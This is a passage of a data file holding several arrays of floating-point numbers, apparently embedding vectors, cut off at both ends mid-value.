607345,-0.02147822,0.0067203674,-0.009233486,0.05987303,-0.06004263,0.018626818,-0.063125074,0.018077467,0.017995967,-0.060928524,-0.010662848,-0.0055107377,-0.02458019,0.027300406,-0.023380224,0.03097913,0.042130034,0.003240554,-0.030928928,-0.052313223,0.029889064,-0.010688047,0.026577946,0.032966085,0.03885613,0.030845912,0.008854858,0.049637903,0.026501006,0.0009972308,-0.028491119,-0.012720104,0.043215144,-0.00983816,0.047131166,0.021100683,0.044176172,0.03540709,-0.052510858,0.027016658,0.060584802,0.02143123,-0.013982103,-0.018355232,-0.017664285,-0.0068163895,0.0238246,0.027713552,0.014072124,0.04598587,-0.004430241,-0.016169492,0.023812067,-0.04021069,0.055197615,0.012950152,0.00019746665,-0.054932777,-0.013644841,-0.06391732,-0.0114879655,-0.058225743,0.01101206,-0.027624067,0.0069552935,-0.00731006,-0.022848476,-0.022075355,0.033068597,0.00040808896,-0.031497132,0.030232508,-0.025487859,-0.008764877,0.042216506,-0.003207046,0.012032873,0.011663075,0.026334992,0.09084978,0.011771234,0.020534767,-0.0493395,-0.032182097,0.040552806,-0.02067837,-0.039972544,-0.023013366,-0.06806443],[0.018177656,0.04978132,-0.15771587,-0.0515444,0.07955739,-0.04505603,-0.002415571,0.014440228,-0.0036990652,-0.0150429355,-0.044014625,0.040805336,0.013044658,-0.00885813,0.018977242,-0.034448978,-0.016254483,-0.037478175,0.001556391,-0.062130753,-0.010637294,-0.078308985,0.023470242,-0.02891108,0.08943116,-0.0025765891,0.011503678,-0.026862174,-0.018596828,-0.0011054765,0.07797516,-0.04027875,-0.05150469,-0.017003829,-0.06314481,-0.019274056,0.07333602,-0.038078878,-0.026051534,0.036314975,0.055179328,-0.011751169,0.025270784,-0.036736507,0.03318835,-0.0047471137,0.07583838,0.023527993,0.0507115,-0.08276894,-0.061436117,0.01692949,0.020457406,-0.029281499,0.08058338,0.014916263,-0.03944028,0.038225424,-0.021110274,-0.04052352,0.063171715,0.043322675,-0.013938937,0.06830849,0.03297166,-0.03061081,-0.07178514,0.061709676,0.011257395,-0.00033802586,0.029572593,-0.0020732023,0.004771163,0.011984397,0.037581857,-0.00048321497,0.0040833014,-0.05303883,-0.010581701,0.05298548,-0.0035074872,-0.01167837,0.0323015,-0.046153475,0.030816263,0.018667996,-0.033646148,-0.029892717,-0.060386263,0.029914826,-0.032750063,-0.00473481,0.010259177,0.051060162,-0.091574505,0.03260457,-0.008939205,0.019860925,-0.041416284,0.007799175,-0.026102548,0.02720404,-0.023048071,-0.0038101051,0.00547936,0.025234418,0.0038537094,0.017214606,0.033083882,0.03908569,-0.0018260368,0.025753045,0.007214719,-0.021140799,0.030737214,-0.024181895,0.055024236,0.0041164,0.05862152,0.044413365,0.0056195916,-0.011633088,0.011977668,0.015392203,0.07124301,0.040927116,-0.073603526,-0.021326274,-0.0039687487,-0.10013162,0.0093263695,0.0220887,-0.021703063,0.038532417,-0.009362105,0.06889749,-0.04704072,-0.02321988,0.0015191607,-0.0018291121,-0.0066278283,-0.0056326664,0.018042274,-0.018956209,0.018913485,-0.0015314112,0.007044301,-0.018701775,-0.058337167,0.021807007,-0.041285913,0.038888607,0.023236295,0.042651523,0.021035707,-0.026532283,0.044882055,0.0143293915,0.018212492,0.05489451,0.016552102,-0.020421486,-0.06887517,0.055433635,-0.04802506,-0.046234082,0.056393996,0.069885984,0.021550244,0.019172156,-0.054116137,0.008927516,-0.010455521,0.018174862,-0.0021810418,0.045755193,-0.0011808801,-0.059391487,0.017896898,-0.003164528,0.06364906,-0.059155043,0.03129016,-0.012485803,-0.07073991,-0.021987224,0.020991618,-0.08215243,-0.01622116,-0.038663376,0.02165829,-0.010903607,-0.06905845,-0.036480777,-0.027683498,-0.028320733,0.039441876,-0.012427945,0.05610379,-0.03235537,-0.065154344,-0.018362548,-0.016695406,-0.0069442005,-0.032430355,0.04284053,-0.026398353,0.03392911,-0.00132791,0.039636876,0.070729546,-0.013474131,-0.011603013,-0.038424384,0.003494613,-0.035331123,0.028902799,-0.011450612,-0.034982186,0.024226032,0.0694948,-0.0062550656,0.02759904,0.0014233236,0.040989313,0.0005616007,-0.034699365,0.019238215,-0.03743779,-0.005093813,-0.029215228,-0.091615446,0.019514274,0.05933005,0.036021445,0.003440188,0.023190876,0.05855049,-0.00451676,0.0021264486,0.037583042,0.035613526,-0.054514453,0.0072528087,-0.0355003,0.022530023,-0.049599472,-0.03786457,-0.04837544,0.03891236,0.004692766,-0.0022994804,0.028048092,0.012824804,0.04830949,-0.014036035,-0.019162474,0.006456271,0.038984936,-0.056285255,0.022852443,-0.016022656,0.025938358,-0.04664768,-0.017662756,-0.046539843,-0.0053256173,0.034135878,0.004050549,-0.010125887,0.0045745634,0.016719364,0.02290793,0.09961513,0.0044610654,0.00081626046,0.027646933,-0.0034475878,-0.02866166,0.047721267,-0.046753675,0.0031882948,-0.038084667,-0.04279408,0.024512809,-0.015283562,0.06559716,-0.036870707,0.0051761786,0.015700998,0.04451254,-0.04753046,-0.016255498,0.04288512,-0.0055938694,-0.004183585,0.038880486,-0.019199088,0.03910802,-0.033969995,0.01558211,0.039428107,0.029344147,0.027155403,-0.034102768,-0.028983757,0.036826648,0.019180063,-0.029175978,0.0027141392,-0.07635428,0.022408176,-0.0068812133,0.03871252,-0.0053240173,0.022226918,0.020596493,0.02265647,0.03477878,-0.04413698,-0.04170131,-0.02369604,-0.003083492,-0.040713433,-0.039382696,0.0107711945,-0.013530883,0.007936128,-0.017425552,-0.024361245,0.045282416,0.0029564635,0.03198011,-0.031707168,-0.029759139,-0.011493565,0.005399568,0.012432004,0.0046172123,0.029287186,-0.024350276,-0.061159693,-0.03134735,-0.02289639,0.005496352,0.028121825,-0.048209578,-0.0026331872,0.012009498,0.03523411,-0.038760208,0.02042091,-0.03212605,0.003239653,0.009556153,-0.03438672,0.026023254,0.04542912,-0.00051676534,0.011053164,0.023808213,0.039674394,0.010424993,-0.0030258491,0.0057415306,0.05832438,0.029228082,0.0123218605,0.031890705,0.0038180305,0.007947009,-0.05337236,0.007909789,0.041380197,-0.02767637,0.035393752,-0.08619569,0.028895501,-0.035078835,0.025749983,-0.00643537,-0.040841635,0.023761136,0.047168937,0.01552339,-0.038104557,0.037428334,0.0026705456,0.004185569,0.058366947,-0.04729885,0.017163834,-0.052390996,0.019810528,0.018336285,0.027481493,0.051987685,-0.00904917,-0.03330391,0.05810387,-0.023589166,-0.04263598,0.008793061,-0.009763528,-0.015896354,-0.0002503056,-0.004446084,-0.0012500699,0.07529947,0.007068545,0.020384036,0.043393422,-0.064940386,-0.05367098,0.03388993,-0.02464342,0.07742122,-0.0036493184,-0.027196212,-0.026990596,0.019885436,0.036116373,0.032185204,-0.031397052,0.002411313,0.005460353,0.029100137,0.07547546,-0.01298033,-0.07709222,0.007756389,0.027438022,0.03708295,-0.054178607,-0.0002935409,-0.029761039,0.000272578,0.06101459,0.050061196,0.036317386,0.02406503,0.022940064,0.00352044,-0.048600502,0.008516121,0.04745925,0.055659067,-0.021982647,-0.025322046,0.071847335,0.01705602,0.017001037,0.077339396,0.032294743,0.09210299,-0.026189957,0.021045346,0.029455064,0.008829251,0.02331427,-0.003096649,0.026476026,-0.065567076,-0.027516931,-0.0023753482,0.016990624,0.0154898,-0.024095118,0.017382704,0.04174724,-0.059682366,-0.005432798,0.0282573,0.0045028822,0.018766332,-0.017187243,0.003332279,0.04530656,-0.049860068,0.0107366005,0.016964398,-0.03404544,-0.047791842,-0.07588308,0.025873788,0.05051345,-0.025555778,-0.021506162,-0.021908524,-0.01471288,0.023008531,-0.0047805733,0.014522619,0.034246575,-0.01864192,-0.047967676,0.008705016,0.01140924,0.012774277,0.014771351,0.017308751,0.053670503,-0.022566075,-0.034770478,0.053640414,-0.041137874,0.0645926,-0.04691818,-0.007745823,-0.032763366,0.009383981,-0.020655932,0.044641852,-0.025054436,0.05326365,-0.06367469,0.008146393,-0.037240587,-0.08569001,0.019482555,-0.0029996198,0.00008838924,-0.03937738,-0.051213592,-0.053494003,0.032722615,-0.018154142,-0.0055232407,0.0016407747,-0.012730235,0.0064305523,-0.002257603,-0.043422937,-0.011700922,0.03139789,-0.00703869,0.007143709,0.020678196,0.0033395605,0.02331489,0.023615118,-0.022919493,0.02170611,0.034239292,-0.0013424595,-0.020820614,-0.02256946,0.053653352,0.006344892,-0.063880056,0.01195513,-0.049068008,0.013570957,0.01126868,0.025521519,-0.029973071,0.0047761016,0.02377026,0.0023179755,0.010016595,0.017165026,-0.03627424,0.04455727,0.00013763313,0.015220758,-0.072917014,-0.049463473,0.02324547,0.0077208993,0.024476007,-0.04707119,-0.047772326,-0.034489803,-0.005829548,0.0024918942,-0.002110545,0.008174328,-0.01630863,-0.04419966,-0.018561268,-0.048561677,-0.018643165,0.029829483,0.03140661,0.0051566307,0.0018456564,-0.0514987,-0.067149974,0.026096452,-0.022930495,-0.03587303,0.008745209,0.026203346,-0.03606915,0.013752247,0.045250375,-0.04178542,-0.025800716,-0.04361563,-0.024139332,0.020674337,0.008147125,0.032028276,-0.04924234,-0.0038901696,0.079590276,0.00935769,-0.0005457483,-0.024739344,-0.0334332,0.04112276,0.039252087,0.019294063,-0.011066245,0.0032029918,0.007896465,0.03352894,0.009213343,-0.019607136,-0.076670945,0.0063730036,-0.049738243,0.027029958,-0.0052511147,0.05165808,-0.037417877,-0.013777459,-0.08766604,-0.02218137,0.059483364,-0.021938263,0.018792635,-0.0491409,-0.07533752,-0.03294471,0.009217703,-0.028709253,-0.0070704254,0.017694859,0.05752978,0.043902937,-0.020685198,-0.04090835,-0.01569321,0.029464087,-0.041050643,-0.0045997207,0.032056656,0.024177417,0.02314802,0.08347712,0.06482068,0.02211097,-0.014512381,0.010875758,-0.055775378,0.022397254,0.0075061154,-0.04513954,0.019419705,-0.04734679,-0.02388242,-0.0024620027,-0.04701175,-0.01708107,-0.020112354,0.0013631933,-0.013294755,-0.06175813,-0.019189263,-0.020078072,0.013113994,-0.016812244,-0.00048192075,0.012569375,-0.030679554,0.08794341,0.030612227,-0.041547447,-0.018415887,0.009029704,0.03318781,0.04892123,-0.045444913,0.0067124055,-0.056248717,0.0020694265,-0.009777877,-0.0803279,-0.034455955,0.009131736,-0.01860092,0.01104156,-0.009869464,-0.014647471,0.030304305,0.010250288,0.012024012,-0.046099856,0.059451908,-0.03510778,0.00073942676,-0.006654457,0.050487768,0.009978533,0.016191844,-0.015034098,0.029538173,-0.0026239108,-0.027679166,-0.015516298,0.018432338,-0.0025845505,0.058611263,-0.0020698574,0.060165063,0.01860515,-0.02055196,0.030137919,0.04606971,0.07306398,0.01788393,-0.02410851,0.015811944,-0.031901665,0.0016351996,0.05211125,-0.031648297,0.021433946,-0.0008671796,0.0110166455,-0.041410923,-0.07596686,0.029784432,0.02140124,-0.04245551,-0.04900115,-0.023826176,-0.02293025,0.01026366,-0.010219064,0.015337021,-0.0270707,-0.0009680158,0.029405907,0.01757871,0.00714264,0.067280635,-0.0053268834,-0.030792557,0.042708848,0.0031901812,0.020123767,0.034591194,-0.036511313,-0.0033647092,-0.005551764,0.016081737,0.11622142,0.035819605,0.023604771,-0.07032568,0.040261455,0.025661722,-0.05376808,-0.048782956,-0.037547488,-0.029245377],[0.040088274,0.053993624,-0.16570929,-0.027538244,0.08322159,-0.072702885,0.030161083,0.055473015,-0.014715338,-0.006206786,-0.061188996,0.07673822,0.017907692,-0.0298481,-0.006536811,-0.0603168,0.05272318,-0.031244414,0.056267243,0.006629709,-0.004957215,-0.053271264,0.020997861,-0.05200004,0.061267707,0.016504008,0.002429021,0.0024143807,-0.05111712,0.017649803,0.044526868,-0.05657226,-0.040615313,-0.009163015,-0.06802448,-0.026981983,0.012639093,-0.037573013,-0.017315932,0.01084811,0.06472765,-0.026940588,0.035545636,-0.059008546,0.006862848,-0.0002613321,0.031058792,0.018565623,0.049468454,-0.109880604,-0.041304044,-0.020425785,0.03774279,-0.03486862,0.07189587,0.019946048,-0.011490594,0.0408903,-0.015518208,-0.048973255,0.011567563,0.049243137,-0.0005971819,0.07883231,0.049178578,0.020559791,-0.031211425,0.025983538,0.03682893,-0.07364698,0.015885964,-0.012803694,-0.031761542,0.00662429,-0.012714509,-0.0076210364,-0.034373518,-0.0606168,0.021758914,0.036375683,-0.012148903,-0.024476623,0.028136622,-0.047424022,0.030082103,0.012546699,-0.053393178,0.031516664,-0.030637043,0.0371014,-0.058562823,-0.009990394,0.011935768,0.05242495,-0.093197055,0.025315626,0.014960421,0.01009368,-0.046404954,0.015722824,-0.037311923,0.019712811,0.022334836,-0.008570454,0.0011551469,-0.00051342824,0.023936937,0.04377147,0.03818327,0.042978015,0.008236269,0.015263886,-0.017564544,-0.02395318,0.045586843,-0.039784677,0.028960852,-0.015088868,0.01833986,0.01860922,-0.00082264194,-0.06576055,0.0077347048,0.03911174,0.080535054,0.07508255,-0.06692844,0.0071002687,0.024459932,-0.07866292,-0.03323586,0.012813489,-0.008441342,0.02610535,-0.010143086,0.041649703,-0.05310303,-0.063183896,0.036429267,0.021343138,-0.010454494,0.030290922,0.019268163,-0.035682775,0.002648026,-0.0401664,-0.0034053985,-0.026953876,-0.03405848,0.04088383,0.014713931,0.047527414,-0.007923472,0.02833964,0.024017897,-0.0058604083,0.024244476,0.018167084,-0.0025753127,0.05251999,0.023840498,0.011148726,-0.06801799,0.03245285,-0.023314597,-0.04653009,0.028651226,0.057200044,-0.016011467,0.016276108,-0.02899529,0.021179896,-0.014191825,-0.007775658,-0.018247752,-0.006766617,0.011852695,-0.032480646,-0.0063991984,-0.0037656673,0.034218486,-0.0509416,0.08662581,0.03313385,-0.060446367,0.0002927164,0.051376525,-0.049477626,-0.005551909,-0.040379,0.03700337,-0.043028176,-0.037113845,0.002461363,-0.04286827,-0.013326269,0.06062341,0.023915565,0.0609297,-0.03155109,-0.045892153,0.029587407,-0.020401206,-0.021764604,-0.030383345,0.074617416,-0.026499579,-0.006620488,0.0019377605,0.046178065,0.08635766,0.0014124141,-0.033484675,0.030298917,0.00048717618,-0.03218593,0.0020021098,-0.011597497,-0.04472661,0.006166126,0.061079554,-0.005919862,0.05195865,-0.015876554,0.02747985,0.01228335,-0.035877235,-0.0022838,0.0033068652,0.03848599,-0.030935643,-0.0631631,0.044348557,0.010681448,-0.0069421376,0.00060592906,0.010094789,0.11441457,-0.026364071,0.03301583,0.021042818,0.024047233,-0.065900385,-0.00053190894,-0.080009006,0.007151589,-0.07102932,-0.052732036,-0.04036217,0.0095277745,-0.00761298,0.010218898,0.011077205,0.020399015,0.04162388,-0.06778813,-0.005878166,0.011206932,0.0065377713,-0.067153916,0.012215194,0.00129548,-0.008336527,-0.065828875,-0.035429083,-0.050893456,-0.015425069,0.04805752,0.0374032,0.008131245,-0.012076463,0.025847945,0.024175096,0.06771976,-0.01569995,-0.033140045,0.019641781,-0.032397803,-0.008509531,0.036114078,-0.06700409,-0.011998638,-0.020784728,-0.018662589,-0.0025751528,-0.019586913,0.006716822,0.0026667698,0.012934833,-0.020174714,0.02801395,-0.051730055,-0.022271384,0.09096605,-0.026740132,0.004304305,0.070494115,-0.044520024,0.040484745,-0.014772592,0.06754736,0.01825256,0.016814256,0.030308902,0.0069124554,-0.021681001,0.008289337,0.0119459275,-0.018745154,-0.04153397,-0.026607225,0.0037563783,-0.014861976,0.061818156,-0.0435006,-0.016635979,0.009747844,0.019339789,0.01774293,0.0076296767,-0.02104752,-0.0018544254,-0.01575115,-0.009261386,-0.014283191,0.030873993,-0.0119334385,0.047726963,-0.034546275,-0.020275097,0.0058432105,0.017178334,0.040902063,-0.026296113,-0.05115537,0.0075487825,0.016907139,0.0069189523,-0.027760983,0.033569913,0.0030224829,-0.004582525,-0.008867004,0.013637539,0.030134058,-0.00059867173,-0.032180555,0.01985172,0.010419644,0.050834663,-0.040101465,0.029835707,-0.052567486,-0.011243185,0.027551005,-0.026963774,0.0018637709,0.028352669,-0.00086108537,-0.00697829,0.09133091,0.03598351,0.051341917,0.012255039,0.0031136025,0.075672835,0.02473313,-0.038857598,0.012201168,0.02548816,-0.012576361,-0.022864057,0.011040357,0.02818277,-0.017045105,0.0052822884,-0.073934756,-0.022273505,-0.017397976,-0.004924262,0.0023326178,-0.050233822,0.00667649,0.012894618,-0.000010085454,-0.028777441,0.052662496,-0.023373945,0.024811,0.05541535,-0.0058132056,-0.013195934,-0.021657744,0.027077882,-0.021807194,-0.0029660359,0.06947546,-0.015847113,-0.059300955,0.025305675,-0.039996117,-0.07138431,0.023327338,-0.0037776516,-0.02787004,0.003820116,-0.015605165,-0.014400755,0.037994694,-0.005250556,0.011864256,-0.001329379,-0.059251737,-0.026218528,0.012022836,0.029899107,0.0676814,0.022302032,-0.015001238,-0.0449294,0.038276527,0.015916077,0.029758414,0.0043073855,0.011267832,0.011097779,0.018112313,0.0437651,0.0077844285,-0.0625559,0.06964764,0.021461163,0.005269416,-0.05838135,0.028285626,-0.010134856,0.014203814,-0.00017846457,-0.0032044048,0.072720595,0.02247968,0.021068173,-0.031693097,-0.007181798,0.0025887045,0.0727743,0.08072845,-0.036669604,-0.020171393,0.04364387,0.004067509,-0.0051256465,0.05898272,0.022344787,0.08071495,-0.0134606445,0.011184655,-0.0005015835,0.03921251,0.02353194,-0.004347706,0.041353043,-0.033660606,-0.018260654,0.014646486,0.024366146,0.022983888,-0.014095761,0.026155595,0.05145057,-0.045843452,-0.0061509283,-0.0028367636,0.003585997,0.038821746,0.022558335,-0.038838338,0.029116316,-0.033354793,0.028586073,0.018496353,-0.042229146,-0.023078872,-0.086485535,0.00045801548,0.0025050372,0.002693148,-0.003310954,-0.01063185,-0.01243672,-0.010524548,-0.00008388031,-0.0020683063,0.008072789,-0.009047905,-0.05421456,-0.007876583,0.015649803,-0.0063698646,0.0046105664,0.06762483,0.049313214,-0.027494932,0.01596349,0.062165465,-0.037490096,0.06131207,-0.045515966,-0.01511533,-0.033394624,-0.02868532,-0.028238423,0.041597202,-0.06097958,0.06677134,-0.07311403,0.011428949,-0.019727271,-0.08262065,-0.01433532,0.047115937,-0.062202837,-0.060018416,-0.011661202,-0.019216128,0.00012784655,-0.020185221,-0.028104737,-0.009074662,-0.0025408228,0.010264722,-0.04601533,-0.04258359,-0.00366062,0.021356342,0.010549977,0.037279245,0.044141572,-0.00027892913,0.021981291,0.006361838,0.023069885,-0.0034360762,0.027783135,-0.03651056,-0.018688776,-0.020938875,0.048986744,-0.0027891838,-0.056983348,0.008357862,-0.027978996,0.02248144,-0.020003563,0.040420417,0.002383548,-0.012798096,0.012062054,-0.045178685,-0.02485599,0.00030109845,0.023949817,0.06643933,-0.007892586,0.032965068,-0.053484682,-0.047360398,0.02483694,0.0018939576,0.03092998,-0.030620772,-0.02490607,-0.048318498,-0.015753916,-0.0020595782,0.03041725,-0.004871573,-0.008090088,-0.06856801,-0.027114296,-0.027071841,-0.027946196,-0.0034972813,0.020086614,0.018567244,0.006313883,-0.034011886,-0.07130961,0.0840567,-0.04646165,-0.03427167,0.060476594,0.009171395,-0.029977825,0.008782657,0.017761549,-0.015752343,-0.021015892,-0.043427147,-0.032672275,0.023026876,0.011642607,0.045748305,-0.030703956,0.0027913488,0.07251581,0.011231545,0.010467064,-0.02688076,-0.018011235,0.05579436,0.0014277985,-0.01232861,-0.026572237,-0.009832186,-0.024940439,0.043620944,-0.0011965621,0.0072130943,-0.03901583,0.014734114,-0.06272687,0.04098193,-0.012598693,0.04286706,-0.016372513,0.00714547,-0.028239535,-0.014829065,0.020934872,-0.03590594,0.017090611,-0.054623958,-0.0684268,-0.071391694,0.018853951,0.009276617,0.009496214,-0.035680514,0.08528785,0.059713956,-0.034692507,-0.012249518,0.004988697,0.019140653,-0.04147254,-0.022437647,0.04254816,0.051722102,0.010596438,0.052162495,0.055909365,0.012500334,-0.025401393,0.05874819,-0.072567165,0.002392529,-0.0034874638,-0.031013984,-0.020757524,0.005728269,-0.026758939,-0.0058751856,-0.021709392,0.008428349,0.0072614704,-0.00045037296,-0.0144412825,-0.07944623,-0.0019848573,-0.009511758,0.050680816,-0.00026674315,-0.03761028,0.016360512,0.0044435617,0.05117503,0.036699098,-0.029330831,-0.021175837,0.061839424,0.0026689009,0.0675195,0.0022162546,-0.0033540349,-0.035131752,0.023280134,0.022424482,-0.050540965,-0.039210547,0.00023919147,-0.026933083,-0.021274058,-0.025190597,-0.000951469,0.042213555,-0.005565223,-0.029123336,-0.024751103,0.08560894,-0.03566547,0.010858502,0.010129786,0.071070954,0.003255232,0.023263223,-0.022614462,0.00052401045,0.011504562,-0.01829579,0.0020051156,0.016979752,0.040616013,0.03651012,0.0015033185,0.038592484,0.009157499,-0.006675918,0.027772294,0.034065817,0.035080627,0.008083294,-0.038488895,-0.014396435,-0.0063247397,0.043066066,0.051553782,-0.023779413,0.02155893,-0.0020399818,0.039433446,-0.042907614,-0.043531686,0.06653347,0.0031967442,-0.029954946,-0.03705712,0.012919755,-0.089337446,0.0070287767,-0.032260403,0.011694572,-0.042834487,0.013897862,0.014054774,-0.016833683,0.011552511,0.03306678,-0.036139097,-0.015265058,0.06495168,0.0017528938,-0.015600548,-0.001084895,-0.04520952,0.018769275,0.0042938297,0.015399623,0.08549535,0.008560801,0.00816588,-0.045056753,0.03504643,-0.008539171,-0.0045680385,-0.065077305,-0.026684685,-0.0529506],[-0.010988101,-0.019011604,-0.15527551,-0.08581246,0.09875013,-0.038276043,-0.054771956,-0.006134107,-0.019456748,-0.043141197,-0.071427636,0.089380115,0.054538887,-0.03284165,0.013235521,-0.057464037,-0.018399974,-0.025878008,-0.02895069,0.012199753,-0.020658836,-0.05860557,0.00308334,-0.066104725,0.08912625,0.03502651,0.031754114,0.03291683,-0.031002367,0.015754417,0.069584176,-0.05844354,-0.015948731,-0.007822776,-0.13024695,-0.068579495,-0.012846764,-0.03673019,-0.015529033,0.032288097,0.038319256,-0.0036722685,0.012247467,-0.030950116,0.023802813,0.006875469,0.05563816,0.03042062,0.054167688,-0.06651789,-0.011669928,-0.007952278,-0.0052636378,-0.024009433,0.07346809,-0.009507713,-0.0133663425,0.036359124,0.007702638,-0.015987033,0.026391674,0.07617735,-0.014899394,0.10287073,0.046086103,-0.010907965,-0.026016014,0.058436334,0.06024523,-0.020760154,0.015515692,0.004520226,-0.01413291,-0.011785465,0.0047165602,-0.019041507,-0.027204838,-0.085409135,-0.047455486,0.04740637,-0.0020774945,-0.074503765,0.06316989,0.025968581,0.028702704,-0.011900716,0.013540863,-0.017282741,-0.02364176,0.04347018,0.0057741813,-0.0032761698,0.006242629,0.03979763,-0.046632368,0.03943199,0.0023931165,0.025074191,-0.033850204,-0.030212348,-0.011782657,0.009958616,0.0145570645,-0.021604782,-0.03475107,0.05168788,0.026366755,-0.0109926695,0.01611544,0.033591945,-0.0064853583,0.004573267,0.029111236,-0.012838053,0.039751515,-0.054518703,0.039609287,0.00014131708,0.018521776,0.089598686,0.0045869467,-0.013435234,-0.029819086,0.042653557,0.059956815,0.027823713,-0.02898232,0.012416549,0.0361874,-0.047520652,-0.017306214,0.005628536,-0.032621916,0.023941742,0.049042895,0.028743,-0.049817204,-0.06536412,0.033343386,-0.025662685,0.016244248,0.009950891,0.0080051385,-0.027188426,-0.0066980855,0.0034907684,0.011629381,-0.06298514,-0.09004718,0.029546145,-0.03843734,0.02884622,0.004821961,0.031235535,0.027754057,-0.02684165,0.04533259,-0.010608847,0.022275617,0.047788505,0.009373326,0.03685946,-0.05147429,0.04051276,-0.0004514143,-0.053747684,0.0029146555,0.07687799,0.024380518,-0.006766889,-0.049095377,-0.031374346,-0.038320582,-0.00843806,-0.017046323,0.010451848,-0.016575744,-0.012174189,0.03139691,-0.0008353846,0.022300621,-0.044802252,0.07949319,0.029668402,-0.03431209,-0.012188186,-0.018462332,-0.01872243,-0.011063862,-0.020342147,0.0008316945,0.010592274,-0.073497064,-0.030701388,0.014319794,-0.029959615,0.017510993,0.007219606,0.047296736,-0.03299089,-0.0668288,-0.012465171,0.0531666,0.0006758612,-0.046341356,0.06327556,-0.015671834,0.017064435,-0.039198797,0.044037823,0.029911498,-0.024520613,-0.04818783,-0.032601316,-0.0014124572,0.0028037757,0.00936795,-0.028941948,-0.05905535,0.027402582,0.01799752,-0.024194084,0.043470986,-0.016874686,0.030940106,0.020764016,-0.0061292253,-0.0062866276,-0.0048336177,0.003611399,-0.036594354,-0.06979197,0.07766072,0.049219187,0.00880722,-0.015949285,0.036988348,0.06507153,-0.024935702,0.037599966,0.02277969,0.019083627,-0.044914264,0.024021463,-0.07471293,0.008916905,-0.017856058,-0.012873858,-0.036730204,0.0066302614,-0.00852302,0.013003341,0.0039351345,0.024139721,0.066955775,-0.03685918,0.0064366283,0.017523676,-0.012579277,-0.019335719,0.014559,-0.04700753,0.023029258,-0.05209869,-0.0010854504,-0.0703607,-0.04078411,0.05453691,0.0071477382,0.017713107,-0.0070729917,0.010175237,0.05505156,0.027221065,0.0063975393,-0.017883055,0.04898257,-0.038545363,-0.041202266,0.0254904,-0.070009,0.002680263,-0.0038293,-0.032865886,-0.005803982,-0.0024260264,0.025179463,-0.005440162,0.026354948,-0.012826169,0.06579887,-0.06364709,-0.005906009,0.027302263,-0.016295798,-0.021650957,0.0910497,-0.02480901,0.032958657,-0.009269682,0.034527894,0.048217673,0.04607883,-0.023465313,-0.021068659,-0.063165754,0.007818274,0.037629507,-0.004769266,0.02020516,-0.047370665,-0.0038015489,0.013081977,0.04357999,-0.03188304,0.04589751,0.044146497,-0.009369173,0.047636054,-0.0006971071,-0.042579796,-0.03242883,0.0103993295,-0.023457913,-0.025298163,0.036577385,-0.027038565,0.06412121,-0.01770725,-0.05367355,0.014323696,0.012225683,0.043840677,-0.021509526,-0.030414457,0.028597826,0.015573084,0.02123752,-0.029610405,0.06852351,0.029384376,-0.036296513,-0.0057203155,-0.03188078,0.026817774,0.059285022,-0.033140317,-0.03710665,0.0032285214,0.011174006,-0.06605983,0.029430024,0.031228457,0.022687867,0.02251286,-0.008775929,0.014484394,0.021009494,0.025879892,0.0025091043,0.05992741,0.009688325,0.02532965,0.026418466,-0.005220362,0.05292289,0.028107246,0.0059278184,-0.0024043184,0.02009594,-0.021671891,-0.017345918,0.029772,0.010011239,-0.026806172,0.00911613,-0.053385522,0.004107885,-0.00025638545,0.038267523,-0.00030075858,-0.071757555,-0.019493297,0.022708328,0.021633742,-0.016274773,0.027536165,-0.007567787,0.007477872,0.046347246,-0.012757097,-0.019000454,-0.02672821,0.0036039061,0.00078657264,-0.0017077985,0.027634606,-0.017847009,-0.010306454,0.048312806,-0.051218882,-0.09038952,0.015650941,-0.041899774,-0.016770085,0.011700064,-0.04449832,-0.025769236,0.06150849,0.0072762812,0.033733968,0.0013374706,0.01312106,-0.061530534,0.026573831,0.007704524,0.08763831,0.058367185,-0.045744907,-0.019337932,-0.013366087,0.018798603,0.021802988,-0.017827574,0.018807502,0.014553604,0.038546298,0.07799911,0.007084059,-0.04107275,0.023580272,0.05033591,0.048645888,0.013286786,-0.0049488214,0.00050280517,0.020201065,0.03413804,0.03956605,0.023407927,0.03889202,-0.025784506,-0.047077835,-0.062091276,0.024497963,0.09122434,0.0955662,-0.038748313,-0.02170817,0.06275123,0.013652688,-0.0002282206,0.014031134,0.0007419671,0.095178716,-0.01553841,0.039503686,-0.011258045,0.0070079193,-0.016288878,0.0037773852,0.06799336,-0.035021875,-0.016129605,0.011801778,0.027773805,0.0024083857,-0.017235842,0.050041173,0.06544069,-0.07379306,0.001870685,0.048155576,-0.021990847,0.045363493,-0.0049731154,-0.012905183,0.015008832,-0.03644091,0.019269159,0.01383021,-0.048735175,-0.03168848,-0.05322458,-0.02751843,0.05377705,-0.00578023,0.02247508,0.02478445,-0.012669923,0.0024648854,-0.020488359,0.0085575655,0.030893499,0.024728967,-0.026289841,-0.013859715,0.0017435509,0.014414839,0.0122167105,0.0159465,0.03780956,-0.03813056,0.037689086,0.02188485,-0.011730984,0.05610519,-0.016567256,-0.06952219,-0.06825012,0.020323858,-0.041065615,0.03626078,-0.021789894,0.048225444,-0.076074876,0.0077857985,-0.039178006,-0.09006657,0.036155444,0.013746371,-0.016052032,-0.031219697,-0.00016605642,-0.04832786,0.026136136,0.0061809337,-0.015395503,0.0250636,-0.02177533,-0.011450844,0.016126826,-0.033714846,-0.035544388,0.0026015742,0.0067538163,-0.003895716,0.013252404,0.013119855,-0.01611096,0.010353645,0.00068517856,0.004327615,0.015147678,-0.009537574,-0.0126634985,-0.024285764,0.028443614,-0.017053418,-0.0178876,0.006918178,-0.06649331,-0.018423326,-0.053068038,0.047776595,-0.064362906,-0.00089062005,0.0043003336,-0.024021087,-0.035931394,-0.0091519365,0.016346507,0.05350378,0.054783646,0.010808875,-0.028308,-0.010078474,0.056040023,0.011200578,0.03318792,-0.04309697,-0.039813682,-0.06499894,-0.030138547,0.0027395845,0.0035473031,0.039358992,-0.022279212,-0.056015044,-0.02029514,0.020620748,-0.051536962,-0.0031045072,0.021459749,-0.027737558,0.058091972,-0.02200737,-0.058910053,0.029997984,-0.03357652,-0.016993145,-0.0075189355,0.025778215,-0.0095533915,-0.0073379045,0.018404707,-0.03663612,-0.011423888,-0.032209184,-0.026187029,-0.015571577,0.017613191,0.033246927,-0.053801946,-0.04159368,0.068397544,-0.0072008832,0.016779106,-0.038947538,-0.035429202,0.042839613,0.0052864063,0.005782013,-0.0028782268,0.0075851944,-0.023728857,0.0033318445,-0.018002013,-0.017038418,-0.016164985,0.029206218,-0.04977554,0.032816548,0.009621245,0.055250213,-0.0049908413,-0.012637899,-0.019818284,0.008857197,0.052293837,-0.025493177,0.0033116422,-0.082399964,-0.052009936,-0.06780491,0.01994072,-0.016619006,0.031942576,0.020515094,0.050019648,0.06923643,0.019217497,-0.009352977,0.00290935